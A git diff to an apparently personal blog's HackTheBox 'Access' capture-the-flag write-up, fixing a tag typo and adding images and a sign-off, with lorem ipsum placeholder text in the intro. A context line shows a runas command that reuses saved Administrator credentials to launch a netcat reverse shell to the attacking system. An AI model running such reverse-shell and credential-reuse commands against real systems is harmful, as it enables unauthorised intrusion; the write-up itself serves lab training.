--- a/_posts/2018-12-19-Access.md
+++ b/_posts/2018-12-19-Access.md
@@ -2,11 +2,13 @@
 title: "Write-up: Access"
 date: 2018-12-19
 category: [HackTheBox]
-tags: [HackTheBox, HTB, windows, runas, certuil, 7z, readpst]
+tags: [HackTheBox, HTB, windows, runas, certutil, 7z, readpst]
 header:
     teaser: "/assets/images/htb/access/access.png"
 ---
 Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
+
+![access_info](/assets/images/htb/access/access_info.png)
 
 ## User
 To begin the enumeration process, a port scan was run against the target using `masscan`. The purpose of this intial scan is to quickly determine which ports are open so that a more focused `nmap` scan can be performed that will target only the open ports discovered by `masscan`.
@@ -118,3 +120,7 @@ C:\Users\security\Music>runas /user:Administrator /savecred "nc.exe -e cmd.exe 1
 From the connection received on the attacking system, the `root.txt` flag can be read.
 
 ![root_txt](/assets/images/htb/access/root_txt.png)
+
+See you next time!
+
+![access_badge](/assets/images/htb/access/access_badge.png)
